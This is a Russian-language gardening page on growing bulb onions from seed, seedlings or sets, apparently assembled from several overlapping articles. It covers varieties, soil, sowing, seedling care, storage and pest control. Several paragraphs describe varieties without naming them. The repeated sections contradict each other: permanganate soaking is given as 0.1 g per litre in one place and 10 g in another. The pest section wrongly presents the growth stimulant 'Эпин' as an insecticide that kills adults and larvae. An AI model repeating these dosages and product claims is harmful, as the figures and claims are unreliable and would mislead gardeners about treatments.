4 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Как вырастить репчатый лук из севка семян или рассады

Главное — сорт: секреты выращивания репчатого лука из семян за один сезон

Репчатый лук — продукт, постоянно присутствующий в нашем рационе. Данную культуру гораздо приятнее выращивать самому, нежели приобретать на рынках или в магазинах.

К сожалению, вырастить лук из семян за один сезон в домашних условиях получается далеко не у всех, в большинстве случаев это происходит из-за неправильно выбранного сорта культуры.

Из семян лучше выращивать овощ раннеспелых гибридных сортов. В результате можно получить луковицу от 100 до 300 г веса, без особого ухода и дополнительных хлопот.

Плюсы и минусы выращивания лука из семян за один сезон

Положительная сторона посадки лука семенами заключается в том, что посадочный материал расходуется довольно экономно, благодаря небольшим размерам можно правильно распределить его на грядке на необходимом расстоянии для данной культуры.

Такой лук не стрелкуется, в отличие от севка, который нуждается в особенных условиях хранения.

Правильно вырастить севок достаточно сложно, а еще сложнее — обеспечить его сохранность до посадки на весну. Чтобы получить семена, много усилий не требуется, достаточно посадить в середине апреля несколько больших луковиц и собрать с них цветоносы после того, как они созреют.

Недостатки данного способа выращивания лука

К сожалению, для того, чтобы получить лук за один сезон, подходит далеко не каждый сорт, особенно это касается способа выращивания без рассады. Помимо прочего, сохранность такого лука значительно меньше, храниться он может максимум до января. При высадке под открытое небо данный лук нуждается в интенсивном уходе из-за слабых ростков, которые легко забиваются сорняками.

Сорта лука для однолетнего выращивания

Чтобы получить максимально качественный и щедрый урожай, важно разбираться в сортах.

На что стоит обратить внимание перед выбором:

  • сроки созревания культуры (раннеспелые сорта могут сформироваться уже за 80-90 дней после высадки, у среднеспелых же процесс вегетации длится 110 дней, поздним, чтобы созреть, потребуется до 130 дней);
  • количество гнезд у одной культуры (малозачатковые разновидности лука в результате дают одну луковицу, очень редко две, поэтому их выращивают чаще на репку; многогнездные могут сформировать более 5 штук в одном гнезде и в последующем дадут много зеленых перьев);
  • вес плодов (маленькими считаются луковицы весом около 50 г, средние плоды более 120 г, крупные гибриды могут весить более 400-500 г).

Определяясь с сортом лука, надо обратить внимание на вкусовые качества. Как известно, лук бывает острым, средней остроты и сладким. Последний чаще всего используют для приготовления салатов, употребляя его преимущественно в свежем виде. О сортах подробнее можно узнать от производителя семян, все характеристики указываются на упаковке. К этому следует проявить особый интерес, чтобы не допустить ошибок при выборе овоща.

Лучшие сорта для посадки лука за один сезон

Сегодня на рынке представлено достаточное количество сортов отечественной и зарубежной селекции. Стоит рассмотреть самые популярные из них, которые давно проверены временем и хорошо произрастают в наших климатических условиях.

Является довольно урожайным сортом репчатого лука, относится к голландской селекции. В результате можно получить плоды весом более 500 г. По форме луковица вытянута, имеет золотистый оттенок. Чешуи довольно плотные, имеют сладковатый вкус. Данный сорт относится к салатным, сохраняется до января месяца. Хорошо устойчив к заболеваниям, быстро адаптируется к различным условиям содержания, не считая только сильных заморозков. Эксибишен рекомендуют выращивать безрассадным способом — через севок.

Этот лук тоже относится к салатным сортам. Имеет пурпурный оттенок, по вкусу сладковатый с сочной мякотью. По весу данный сорт дает небольшие луковички, всего до 100 г, но при интенсивном уходе максимально вырастать может до 120 г. Период вегетации длится 110 дней. Хорошо переносит неблагоприятные внешние факторы, не подвержен заболеваниям. Чаще всего используется как однолетнее растение, иногда размножается севковым методом. В отличие от других сортов, Ред Барон может храниться до следующего урожая.

Сорт Шаман относится к раннеспелым. Имеет луковицу удлиненной формы, верхние чешуи обладают красным окрасом с коричневым оттенком, внутри — розового цвета. По вкусу довольно острый, по весу всего до 70 г. Хорошо произрастает в посадках, дает обильный урожай, не боится сухой походы. Растить такой вид лука лучше всего рассадным способом.

Давно выведенный многозачатковый сорт лука. Период вегетации длится до 140 дней. При прямом посеве луковицы способны достигать веса 150 г. Если выращивать рассадным способом, то масса одного плода может быть до 300 г.

Лук сорта Восторг довольно плотный, овальной формы, соломенного цвета. По вкусу острый. Данный сорт очень ценят за то, что он дает богатый урожай, абсолютно не привередлив в уходе. Характеризуется повышенной стойкостью к различным заболеваниям, хорошо сохраняется до средины лета.

Относится к сортам средней спелости, дает хороший урожай. По цвету светлого окраса, плоды круглые и плотные. Если выращивать методом севка, плоды вырастают до 100 г, рассадным способом масса одной луковицы может достигать 300 г. Устойчив к мучнистой росе и другим грибковым заболеваниям.

Без последствий переносит засуху и небольшие заморозки, сохраняется до начала летнего сезона. По вкусу сладкий с сочной мякотью.

Гибридные сорта тоже довольно популярны, несмотря на то, что имеют высокую цену. Они более устойчивы к заболеваниям, хорошо сохраняются, дают обильные урожаи даже при посадке в плохую почву. Очень часто опытные садоводы при посадке лука из семян используют сорта голландской селекции.

Относится к раннеспелым сортам репчатого лука. Луковицы белого цвета, немного острого вкуса. Вес до 90 г. Переносит заморозки, засуху. Дает вкусный урожай, может храниться до декабря.

Среднеспелый сорт, который не боится холодов. Форма луковицы круглая, весом до 100 г. Данный гибрид многозачатковый, дает много зелени. Устойчив к грибковым заболеваниям, ему не страшны заморозки. По вкусу средней остроты, долго сохраняется.

Относится к скороспелым сортам лука. Его рекомендуют выращивать в южных регионах. Дает хорошие сборы, несмотря на засуху. Обладает высокой лежкостью, сохраняется до следующего урожая. По вкусу неострый, масса одной луковицы до 100 г

Довольно надежный гибрид средней спелости, но с небольшими плодами. Максимальный вес одной луковицы 90 г. По цвету светло- коричневого оттенка, имеет немного острый вкус. Хорошо адаптируется к любым погодным условиям.

Данный сорт называют деликатесным. Лук по форме круглый, красного оттенка. Дает качественные плоды, адаптируется к любым погодным условиям. Может храниться до февраля.

Совсем недавно появился на рынке данный голландский гибридный сорт лука, который дает довольно крупные плоды весом 250 г. По цвету золотисто-коричневый, приносит много зелени. Устойчив к засухе и различным заболеваниям. Отличается высокой лежкостью, при этом не теряет своих вкусовых качеств.

Этот сорт относится к среднеспелым. Луковицы имеют круглую форму, золотистого оттенка. По весу 100 г, устойчив к грибкам и изменению погодных условий. Лежкость довольно долгая, имеет сочный и приятный острый вкус.

Посмотреть наглядно, как вырастить из семени лук сорта Эксибишен, можно в видеоролике.

На что обратить внимание перед тем, как сажать лук в домашних условиях

Первое, на что надо обратить свое внимание — это качество посадочного материала. Неправильный выбор семян может дать плохой результат посадки, что значительно отразится на будущем урожае. На сегодня существуют специальные агротехнические методы, которые важно знать каждому человеку, имеющему свой дачный участок.

Когда собирать семена чернушки

Уборку семян стоит производить, когда появляются в зонтиках единичные треснувшие коробочки с уже созревшими черными семенами. Данная процедура выполняется не сразу, а в несколько этапов. Как показывает практика, все зонтики вызревают далеко не равномерно. В засуху процедуру проводят примерно к средине лета, при повышенной влажности — ближе к концу августа.

Если наступили заморозки, а чернушка еще не созрела, тогда выдергивают луковицу со всеми стрелками и кладут в помещение до момента созревания.

Отрезать зонтики лучше всего ножницами. После этого их просушивают, иногда время просушки может затянуться до самой осени.

Иногда можно применить воду — тогда чернушка осядет на дно, а вся шелуха поднимется кверху. Такие семена будут довольно чистыми, но существует риск того, что часть зерен может утратиться вместе с влажной шелухой.

Проращивание семян

Прорастают семена лука довольно долго, а если использовать безрассадный способ выращивания, значительная часть проросших семян может забиваться сорняками, вследствие чего растению грозит гибель. Чтобы избежать этой ситуации, чернушку стоит замочить на 1 день в воде с добавлением перманганата калия. Также в эту жидкость можно добавить стимулирующие рост овоща препараты.

Чтобы получить быстрые всходы, семена можно поместить на влажную салфетку и накрыть их мокрой марлей. Спустя 10 дней они начнут проклевываться, и только тогда их можно сеять во влажную почву.

Поливать необходимо до появления первых всходов. Если зерна попадут в пересохшую землю, то культура не взойдет.

Иногда семена приклеивают к туалетной бумаге клейстером из крахмала. После того, как они прилипнут, бумагу необходимо скрутить в рулон. Когда подходит время к высеву, заготовку кладут семенами вниз. Данным методом можно добиться равномерных всходов, прореживать которые нет необходимости.

Сроки посева

После того, как семена пробыли сутки в воде, их необходимо просушить до рассыпчатого состояния, и только тогда высаживать в почву. Таким способом можно будет достичь быстрых всходов и снизить вероятность появления сорняков, которые способны помешать правильному росту овощной культуры.

Чтобы сформировались луковицы, должен быть питательный грунт и хорошее солнечное освещение. Наилучшими предшественниками данной овощной культуры считаются огурцы, картофель, капуста и бобовые. Место для посадки следует подготавливать с осени. Почву нужно перекопать, удобрить компостом и добавить минеральные подкормки.

Перед сбором урожая следует прекратить поли, как минимум за неделю.

Как выращивать рассаду

Рассаду лучше высаживать в емкостях: специальных ящиках или горшках. Исходя из правил агротехники, необходимо учесть некоторые моменты перед высевом чернушки:

  • семена располагать на расстоянии 5 см между рядками;
  • на один квадратный метр расход зерен может варьироваться от 15 до 20 г (все зависит от сорта сеяного лука);
  • с момента посадки зерен ящики помещают в теплое помещение с температурой +18…+26 °C;
  • после появления первых всходов температуру снижают до +14…+17 °C (данная процедура очень важна, иначе в рост пойдет зелень, но никак не репка);
  • пока рассада будет расти, необходимо регулярно осуществлять подкормки (удобрять землю можно куриным пометом, который следует развести в воде 1:10).

От появления первых всходов до достижения времени, когда рассаду можно высаживать на постоянное место обитания, проходит приблизительно 2 месяца. Этого периода будет вполне достаточно, чтобы появились первые листочки.

Агротехника выращивания лука репки за один сезон

Если следовать определенным правилам, то выращивание лука за один сезон займет немного времени. Большинство садоводов использует рассадный метод, но для этого важно подготовить все необходимое:

  • семена хорошего качества;
  • качественную почву;
  • емкость;
  • полиэтилен.

Вырастить рассаду можно на подоконнике. Для посева стоит выбирать полуострые и сладкие сорта. Лучше всего сеять их в конце февраля или в самом начале весны. Перед посадкой провести замачивание, как указывалось выше, и хорошо просушить. После посева должно пройти около 60 дней, и только тогда можно приступать к посадке в почву.

Но, прежде чем переселить рассаду на грядку, следует произвести пикирование. Для этого необходимо подрезать вверх корня и часть стебля.

Вырастить лук за один сезон может любой садовод. Большинство применяет рассадный метод, он менее хлопотный. Для этого используют обычные емкости, а по прошествии нужного времени пересаживают рассаду в грунт.

Самое важное, во время роста растения создать ему благоприятные условия, уделив особое внимание температурному режиму и регулярному поливу.

Способы выращивания репчатого лука

Всем привычный и такой обычный для нашей кухни репчатый лук вполне можно выращивать на дачном участке и создать для себя запас этого необходимого продукта. Если, конечно, знать правила выращивания, и только такое знание поможет получить хороший урожай с собственного участка.

Общие условия для выращивания репчатого лука

Лук относится к холодостойким культурам, комфортная температура для него 12-16 градусов тепла, для прорастания семян достаточна температура 4-5°. Взрослые луковицы способны без ущерба переносить пяти-шести градусный мороз. Причем большей морозостойкостью отличаются острые сорта, для сладких трех-четырех градусный мороз уже представляет угрозу.

В первые 2/3 периода развития культуре нужен регулярный полив, а в последнюю треть рекомендуется слегка подсушить грунт. Потребность в солнечном свете у лука выше, чем у большинства корнеплодов или капусты. Требования к почве тоже довольно высоки, лучше подойдут почвы с нейтральной, либо слабощелочной реакцией.

Место для выращивания

Плодородная почва и сорняки – два фактора, которые приходится учитывать, выращивая лук. Участок под него подойдет не любой. Желательно, чтобы он располагался высоко, с него пораньше сходил снежный покров и излишки влаги. Легкие почвы с нейтральной реакцией – вот то, что подойдет репчатому луку. На кислых и плотных почвах получить хороший урожай будет очень непросто. В почве должно содержаться необходимое количество питательных веществ пери одновременном отсутствии семян сорняков. Хорошими предшественниками считаются огурцы, картофель, которые удобрялись навозом.

Сам лук негативно реагирует на свежий навоз, может заболеть и не вызреть. К тому же в навозе обычно содержится уйма сорняков, которые для плода губительны. Рекомендуется вносить в почву перегной порядка 2-3 кг на каждый кв. м., суперфосфата ок 20-30 г, аммиачную селитру (10-12 г), н повредит и калийная соль (ок. 15 г).

Подготавливать почву для лука следует сразу после уборки растения-предшественника. Для начала прорыхлить почву на 4-6 см вглубь (мера против сорняков). Спустя пару недель, но обычно не позднее 15-20 сентября, вносится суперфосфат и проводится перекапывание участка на глубину штыка лопаты.

Лук высаживается рано, поэтому в начале весны, как только сойдет снег и можно будет обрабатывать землю, приступают к разбрасыванию перегноя на участке и формированию гряд. DachaDecor.ru рекомендует делать полотно гряды в 1 м, а борозду — в 40 см шириной. Причем на участках, располагающихся повыше, гряды можно сделать пониже (15 см), а в низких местах довести высоту гряды до 25 см. Сверху на гряду высыпают хорошо измельченные удобрения (азот, калий) и граблями заделывают в почву. После такой подготовки можно приступать к высадке.

Выращивание лука возможно несколькими способами. В один год – путем посева семян и высадки рассады, в два года – методом посадки севка.

Выращивание репчатого лука методом посева семян

Чтобы лук успевал созреть, сев надо начинать в конце апреля или сеять под зиму. Для получения хорошего урожая предварительно надо отсортировать щуплые семена от полновесных, для чего удобно использовать подходящих размеров сито, либо проделать все вручную.

Семена с роговидной оболочкоймедленнее набухают и прорастают. Всходы семян, высеянных без замачивания, следует ждать не раньше, чем через 3 недели. Чтобы сократить это время применяют разные методы. Один из них – замачивание семян в водном растворе метиленовой сини (0,3 г /1 л). Способствует лучшему прорастанию и 0,1 г марганцовки, разведенной в литре воды. За неделю до планируемой даты посева семена замачивают на сутки в стеклянной таре. Они будут впитывать раствор, поэтому его надо подливать, но так, чтобы он не накрывал семена больше чем односантиметровым слоем. Емкость с семенами в растворе нужно держать при температуре 20-25 градусов. Набухшие семена выкладывают на мешковину, стараясь не делать толстый слой, сверху накладывается другой отрез мешковины. Теперь нужно ждать, пока не проклюнутся ростки, при этом семена должны оставаться влажными.

Иногда получается, что семена уже проклюнулись и готовы к посеву, а участок почему-либо не готов. В этом случае семена помещают на ледник до дня посева. Перед посевом семена можно немного обсушить.

Высевают лук на ровную гряду, в которой делают держаком граблей 5 бороздок, оставляя между ними 20 см земли. Доской (планкой) следует немного уплотнить почву на дне каждой борозды и высеять семена. Средний расход сухих семян -1 г на 2 метра гряды.

Средняя глубина закладки семян составляет 2-3 см, меняясь в меньшую сторону на легких и в большую сторону на тяжелых почвах. Бороздки хорошо потом замульчировать, для чего подойдут торф или перегной. Мульчирование не даст образоваться почвенной корке после осадков, и всходы будут более дружные.

Для подзимнего посева гряды начинают делать сразу после перекапывания земли осенью. Выровняв и промаркировав гряды, ждут наступления холодных погод. Посев семян проводится перед похолоданием. Для сева отбираются здоровые крупные семена, обязательно сухие. Заделывать в землю на 1,5 см, непременно надо мульчировать. В земле семена набухнут благодаря скопившейся за осень влаге, но прорасти, по идее, не должны. С наступлением весны верхние слои земли оттают, и семена начнут прорастать, что происходит уже при 3-4 градусах тепла. Таким образом, ко времени, когда только приступают к подготовке почвы, семена лука уже успеют прорасти.

Уход за луком

Практически с начала посадки растение нуждается в тщательном уходе. Требуется не допускать возникновения почвенной корки и своевременно удалять появляющиеся сорняки. С этой целью надо регулярно рыхлить землю граблями пока не появятся первые всходы, а после появления рыхлить, проводя специальной частозубчатой кошкой в междурядьях. Рыхлить надо, проникая в землю на 5-6 см.

Меньше сил на борьбу с сорняками уйдет, если рыхлить землю, пока еще ростки сорняка красноватые и мало заметны. В этой фазе у них еще не успели появиться разветвленные корешки, и даже небольшое воздействие их может уничтожить. Рыхлить почву нужно довольно часто, желательно 2-3 раза в месяц. Особенно полезно рыхление после прошедшего накануне дождя, так как способствует сохранению влаги в почве. Важный момент: у лука прекратится рост, если его сильно засыпать землей, поэтому старайтесь отодвинуть почву от ростков.

Пару раз можно подкормить посадки удобрениями – в мае внести азотные удобрения (10-15 г/2 метра гряды) или навозную жижу (в соотношении 1 к 6 с водой). Спустя недели три после первой подкормки проводим вторую: вносим повторно аммиачную селитру и калийную соль (в сухом или растворенном виде).

В засушливые май, июнь и первую половину июля лук нуждается в поливе для стимулирования роста. В июле проводят прореживание и заодно начинают уборку. Сперва удаляют каждое второе растение, после второй и четвертый ряды можно полностью убрать, так что на гряде останутся лишь три ряда, на которых лук и будет достигать полной зрелости.

К концу июля поливы следует прекратить, в августе кончики перышек уже начнут подсыхать и растения можно аккуратно поддернуть, тем самым оторвав часть корешков от почвы, что поможет лучше созреть луковицам. О том, что урожай пора снимать, подскажут повалившиеся перышки. Убранный лук нужно просушить. Через неделю перо совершенно усохнет, его тогда обминают и удаляют с луковицы. Плоды с толстой шейкой лучше сразу начинать употреблять в пищу, так как они быстро портятся. Вызревшие луковицы подлежат просушиванию: сначала 5-7 дней при темп. 20-25 градусов, а затем еще с неделю при 30-35 градусах. Помещение, где проводится просушка, должно хорошо проветриваться. Просушенные луковицы подвешивают для лучшей сохранности.

Выращивание методом рассады

Методом рассады лучше выращиваются определенные, главным образом малозачатковые сорта лука – Даниловский 301, Сибирский однолетний, Кааба и некоторые другие. Преимущество метода – улучшенная урожайность по сравнению с семенным методом

Для выращивания рассады в индивидуальных хозяйствах обычно используют парники или обычные ящики с землей. На рассаду высевать лук рекомендуется в период с 10-го по 20-е марта. Теплый парник к посеву подготавливается как обычно, грунт надо выровнять и с помощью планчатого маркера маркировать. Между рядками оставлять по 5-6 см. Норма посева составляет 20 г/1,5 кв. м (1 рама). Поверх семян положить слой земли в 1 см толщиной. Кстати, семена лучше подготовить способами, описанными ранее в статье. После посадки поливать землю не стоит, чтобы не охладить парник.

Пока не появятся всходы, температуру в парнике надо поддерживать на уровне 20 градусов тепла. Чтобы это легче было сделать, с наружной стороны парник рекомендуется утеплить навозом и тщательно закрыть все рамы, использовать маты, чтобы не оставалось ни малейших щелей.

Всходы появляются на пятый-восьмой день, тут же надо снять маты с рам, чтобы в дневное время внутрь попадал свет. На несколько дней температуру снижают до 10-11 градусов, затем поддерживают на уровне 11-19 градусов. За 14-21 день до высадки в открытый грунт температуру в парнике плавно снижают, чтобы она сравнялась с температурой грунта.

Подкармливают 2 раза — на 20-е сутки после всходов и еще через 14 суток. Рекомендуемые удобрения – аммиачная селитра (20-30 г), калийная соль (10-14 г), суперфосфаты (30-50 г). Удобрения разводят в лейке объемом 5-10 л, этого количества хватит для 2 рам парника. В процессе подкормки брызги раствора попадают на листья. Надо смыть, поливая из лейки с чистой водой. Во второй раз вносят в 1,5-2 раза больше удобрений. Прочий уход не отличается от применяемого в методе разведения семенами: умеренные поливы, регулярные рыхления, ликвидация сорняков.

Рассаду с тремя-четырьмя листочками переносят на грунт в середине мая. Хорошей мерой является обрезание листьев рассады перед высадкой приблизительно на 1/3, чтобы в период адаптации растения к грунту воды испарялось меньше. Эту процедуру желательно проделывать загодя, за три-четыре дня до высадки, чтобы срезы зажили.

Высаживать на гряду надо рядами, междурядья по 20 см, промежуток между растениями в одном ряду поставлять в 4-6 см. Уход аналогичный тому, что рекомендуется при выращивании из семян.

Выращивание из севка (двухлетний метод)

Пожалуй, этот метод самый лучший, если ставить целью получить урожай хорошо вызревшего репчатого лука. Применяется к острым и полуострым сортам, таким как Стригуновский. Погарский, Вишенский, Арзамасский и др.

Выращивание в первый год

В первый год выращивается мелкий лучок с диаметром головки 0,5-3 см, называемый севком. Землю под севок выделяют плодородную, свободную от сорняков. Посев производится в конце апреля, то есть довольно рано. Стоит подготовить семена, замочив их в воде или, что будет еще эффективнее, в растворе метиленовой сини. Технологии замачивания мы рассматривали выше. Затем 3-4 дня уходит на проращивание, после чего наклюнувшиеся семечки помещаются на ледник, где держатся около 2 недель до посева.

Почва для посева должна быть хорошо увлажненной. Для получения высококачественного севка применяют метод загущенных посевов -высевается 10 г семян на 1 кв. м., междурядья делаются по 10 -15 см. Задел семян на 1,5 — 2 см, если глубже заделать, то прорастание будет идти более медленными темпами и не столь дружно.

Уход за луком-севком не отличается своеобразием, в основном такой, как при однолетнем выращивании. Через три месяца севок созревает. Уборка обычно приходится на середину августа. В принципе, более раннее созревание улучшает условия для сушки, дозревания и хранения. С квадратного метра легко можно собрать 1 кг севка.

Выдернутый лук раскладывается прямо на гряде и сушится 4-5 дней. В дождливые дни плоды переносят под защиту навеса. Время от времени севок переворачивают, чтобы подсыхал равномерно.

Следующий период сушки проводится уже в помещении и длится 2 недели. Севок за это время дозревает. Высохшее перо с корешками обминают, удаляют больные или поврежденные луковицы.

Непосредственно перед упаковкой на хранение лук нужно прогревать в течение 8 часов (при темп. 35-40 градусов), затем отсортировать по отдельности мелкий, средний и крупный севок. Отдельно отбирается самый крупный лук-выборок (до 4 см в поперечнике), который можно использовать как посадочный материал при выгонке зеленого пера.

Хранение лука-севка

Севок лучше всего хранить в подвешенном мешке, либо в корзине. В помещении, где хранится овощ, температура должна быть 1-2 градуса выше нуля, Это что касается условий хранения мелкого севка. Кстати, краткосрочные повышения температуры градусов на пять-шесть ему не страшны.

Для хранения крупного и среднего севок требуется поддержание температурного режима в 15-18 градусов и выше.

Второй год культуры

Для второго года выращивания также потребуется качественно подготовить почва — хорошо удобренная перегноя или компоста (4-5 кг / кв. м) а также минеральными удобрениями (до 70 г / кв. м) или древесной золой (150 г / кв. м).

Высадку начинают в первой декаде мая. Высаживают растения, оставляя по 6-8 см между соседними в ряду, междурядья делают по 25-30 см. Глубина заделки очень важна – севок рекомендуется накрывать слоем земли в 1-1,5 см. Спустя неделю (или даже на день-два раньше) появятся всходы. Почву надо сразу прорыхлить и в дальнейшем повторять эту процедуру 2-3 раза в месяц. Интересной и полезной будет статья о луке-чесноке “Рокамболь”.

Посадка лука севка (видео)

Это рыхление, выдергивание сорняков, подкормка (2 раза) и полив в засушливые дни. Заметив стрелки на луке, их следует незамедлительно удалить. Правильно удалять стрелку ниже вздутия над шейкой, тогда новые стрелки здесь не появятся.

Крупный севок по количеству дает самый лучший урожай, но качество страдает из-за множества мелких луковиц. А вот из мелкого севка в гнездах образуются по 1-2 крупных луковицы.

Уборка

К уборке обычно приступают в последних числах августа, когда до 2/3 растений уже созрело. Не желательно начинать уборку позднее, так как, попав под заморозки, лук потеряет способность к длительному хранению, а из-за осенних дождей могут вновь появиться корешки, и такой лук тоже долго не сохранится.

Собранный лук подвергают сушке, этапы которой не отличаются от сушки лука-севка. Затем урожай сплетают в косы и помещают в сухое помещение.

Как вырастить репчатый лук из севка, семян или рассады

Существует несколько способов вырастить на своем участке крупные и сочные луковицы. Наиболее часто применяются три метода: из севка, семян или рассады. Выращивание репчатого лука в домашних условиях поможет вам не только сэкономить на покупке овощей, но и обеспечит качественным посадочным материалом. Для успешного выращивания нужно придерживаться определенных рекомендаций.

Биологические нюансы

Лук может быть однолетним, двухлетним или трехлетним.

В первый год после посева огородник получит севок — небольшие луковицы, диаметр которых не превышает 2 см. Их вес составляет 2-3 г. На следующий год созревает крупная луковица, которая называется маткой. На третий год, при желании, огородник высаживает матку, чтобы получить семена (чернушку).

Если проводить посадку репчатого лука в южных регионах страны, то семена при соблюдении технологии можно получить уже на второй год. Для этого в первый год высадите на своем участке матку, чтобы на следующий — собрать семена, которые содержатся в цветоносе. Они представляют собой вертикальные побеги, на концах которых есть округлые соцветия.

Топ-5 сортов репчатого лука

Существует несколько самых популярных сортов репчатого лука.

  1. Стимул — культура с ранними сроками созревания и сладким привкусом. Плоды вырастают весом до 150 г. Показатели урожайности высокие — 5 кг с 1 кв. м.
  2. Апогей созревает за 80 дней с момента посадки. Его вкус насыщенный и острый. Каждая головка весом 120-160 г. С 1 кв. м. собирают до 6 кг продукции.
  3. Халцедон имеет средние сроки созревания. Его вкус острый. Луковица достигает веса в 100 г. Показатели урожайности — 5 кг с 1 кв. м. Особенностью этого сорта является то, что он относится к культурам, которые отмечаются хорошими сроками хранения.
  4. Догадка — острый сорт, который созревает рано, буквально за 60 дней. Собранный урожай качественный, хорошо хранится. С 1 кв. м. собирают всего 3 кг продукции.
  5. Эксибишен — разновидность с поздними сроками созревания. По вкусу луковицы немного острые, самые крупные из них достигают веса в 200 г. Недостатком считается то, что они плохо хранятся. Достоинство — в большом урожае: 8 кг с 1 кв. м.

Основные рекомендации

Лук относится к морозостойким культурам. Оптимальная температура, при которой он созревает, составляет 14-18 °С. Семена могут прорастать даже при 5°С. Созревшие луковицы могут противостоять заморозкам до -6 °С, но такими достоинствами характеризуются только острые виды. Если рассматривать сладкие сорта культуры, то они могут погибать даже при -3 °С.

В течение первых месяцев нужно обеспечить репчатому луку качественный и обильный полив. За несколько недель до уборки урожая его прекращают, чтобы подсушить почву. Культура нуждается в большом количестве солнечного света, по сравнению с другими корнеплодами.

Высаживание лука следует проводить в слабощелочные или нейтральные почвы. Нельзя сажать лук в места, куда был внесен свежий навоз. Это связано с тем, что в нем содержится большое количество кислоты и семена сорняков.

Важно подготовить почву не за несколько дней до посадки, а осенью, сразу после сбора урожая культуры-предшественника. В конце сентября подкармливают участок раствором суперфосфата (30 г на 4 л воды) и перекапывают.

Поскольку лук относится к культурам, которые нужно сажать рано, уже ранней весной обрабатывают участок, разравнивают почву и формируются грядки. Их ширина должна составлять 1 м. Покрывают грядки измельченными удобрениями (аммиачная селитра или калий) и с помощью граблей разравнивают. Как только подготовка будет завершена, можно сажать семена в грунт.

Оптимальное место

Вырастить качественную продукцию можно, только если посев семян будет проводиться в питательную почву без сорняков. Старайтесь проводить посадку на возвышенных участках, чтобы снежные насыпи стекали ранней весной. Почва должна быть питательной, с минимальным количеством щелочи.

Посадка семян репчатого лука разрешена после таких культур, как картофель или огурец.

Не рекомендуется высаживать репчатый лук после моркови или свеклы. Культурам свойственно впитывать все полезные вещества из почвы. В результате на следующий год грунт имеет более низкие показатели качества.

Чтобы повысить в нем уровень полезных веществ, нужно высаживать на этом месте кабачки, томаты или бобовые культуры. Они помогут насытить землю нужными веществами, чтобы потом снова вы могли посадить лук.

Использование семян

Чтобы получить своевременный урожай, посев семян в открытый грунт должен осуществляться ранней весной или на зиму. Качественный урожай зависит от посадочного материала, поэтому перед посевом нужно отобрать полновесные луковицы. Для этих целей используют крупное сито.

Если заранее не замочить семена, то всходы появятся только через месяц. Для сокращения этих сроков можно прибегнуть к разным способам. Часто используют раствор метилена (30 мг на 1 л воды) или марганцевый (10 г на 1 л воды).

За несколько дней до посева лука нужно поместить семена в один из этих растворов, обязательно в тару из стекла. Хранить посадочный материал в растворе нужно при температуре в 20°С.

Те семена, которые набухли, помещают на слой ткани. Сверху накрывают еще одним тканевым слоем и ждут, пока не они не прорастут.

Когда все будет готово, можно приступать к посеву. Для выращивания репчатого лука из семян в открытом грунте потребуется подготовить грядки. Сделайте несколько бороздок с помощью сапки или граблей.

Между рядами должно оставаться расстояние в 20 см. В лунки помещают семена таким образом, чтобы на 1 м уходило не более 2 г культуры. Неважно, проводите вы посев зимой или весной, глубина внедрения в почву должна быть 2 см.

Дальнейшие действия заключаются в мульчировании грядок с помощью торфа. Это позволит защитить верхний слой почвы от образования корки.

Рассадный метод

Методом рассады высаживают малозачатковые сорта — Эксибишен и Халцедон. Следует пользоваться парниками или отапливаемыми теплицами. Сажать лук для получения рассады нужно в конце марта.

Подготовка парника заключается в разравнивании почвы и маркировке грядок. Дистанция между рядами должна быть 5 см. На 1 кв. м. высевают 20 г продукции. После посадки нужно накрыть грядки слоем почвы и утрамбовать.

До момента прорастания рассады, нужно поддерживать одну и ту же температуру в парнике (около 20-22 °С). В этом поможет утепление матами и навозом. Первые всходы образуются через неделю. Сразу после этого снимают маты, чтобы рассада получала достаточное количество солнечного света.

На 2-3 дня нужно снизить температуру до 10 °С, а потом снова повысить до 17 °С. За 2 недели до посадки в открытый грунт, нужно снизить температуру воздуха до такой степени, чтобы она не отличалась от воздуха на улице.

Как только на рассаде появится 4 листа, ее пересаживают в открытый грунт. Обычно это происходит в конце мая. Перед пересадкой укоротите листья культуры, буквально на 0,5 см. Это необходимо, чтобы растение вытягивало меньше воды из почвы. При пересадке придерживаются междурядного пространства в 20 см, а между лунками 5 см.

Двухлетний вариант

Использовать двухлетний способ выращивания репчатого лука из севка разрешается для острых сортов. Он позволяет получить более качественный и ранний урожай.

В первый сезон вырастает небольшой плод с диаметром около 2 см — севок. Для него потребуется готовить плодородный грунт, с минимальным количеством кислоты.

Посев осуществляется в апреле. Заранее севок нужно замочить в воде на несколько дней. После этого нужно прорастить его в течение 3 дней и поместить в морозильную камеру на 6 часов.

Качественный севок получится вырастить, только при загущенном посеве. На 1 кв. м. высеивают почти 30 г лука. Междурядное пространство должно составлять 40 см, а заглубление — 2 см.

Чтобы на второй год вырастить репчатый лук, снова нужно подготовить почву. Для этого ее подкармливают перегноем (5 кг на 1 кв. м.) и минеральными удобрениями (100 г на 1 кв. м.). Высадка проводится в начале мая. Культура должна высаживаться на расстоянии 5 см между лунками. Между рядами оставляют дистанцию в 40 см.

Углублять севок нужно на 2 см, плотно накрывая слоем земли. Буквально через 7 дней появятся первые всходы. Рыхление верхнего слоя грунта необходимо 2 раза в неделю.

Защита от заболеваний и паразитов

Самым распространенными заболеваниями, которые поражают репчатый лук, считаются корневая гниль и мучнистая роса. Бороться с ними несложно, если вовремя использовать химические инсектициды или настойки из растений:

  • быстродействующий способ — обработать участок раствором бордосской жидкости (40 г на 6 л воды) или «Барьером» (100 г на 4 л воды);
  • из настоек, которые легко приготовить в домашних условиях, отмечают чесночный настой (200 г измельченного чеснока заливают 3 л воды) или раствор кайенского перца (1 ст. л. на 5 л воды).

Обрабатывать участок следует не чаще, чем 1 раза в месяц. Из вредителей отмечают моль, муху, нематоду или журчалку. Избавиться от этих насекомых позволит раствор «Эпин» (2 ампулы растворяют в 4 л воды). Он не только уничтожает всех взрослых особей и личинки, но и создает защиту от повторного заражения.

Уход за культурой

С первых дней посадки репчатому луку нужен хороший уход. Нельзя допускать, чтобы верхний слой почвы покрывался коркой или культуру окружало большое количество сорняков. Рыхление и удаление лишних растений нужно проводить несколько раз в неделю. Мелкие сорняки лучше удалять руками, чтобы не повредить всходы.

Старайтесь удалять траву в тот момент, когда ее корневая система не развилась, и не поглотила посадки лука. Важно пропалывать грядки сразу после дождя. Так влага в почве будет сохраняться дольше. От ростков отодвигайте почву, чтобы не замедлялся рост растения.

Несколько раз, но не обильно, можно внести удобрения.

  1. Через месяц после посадки — азотные вещества (20 г на 1 кв. м.).
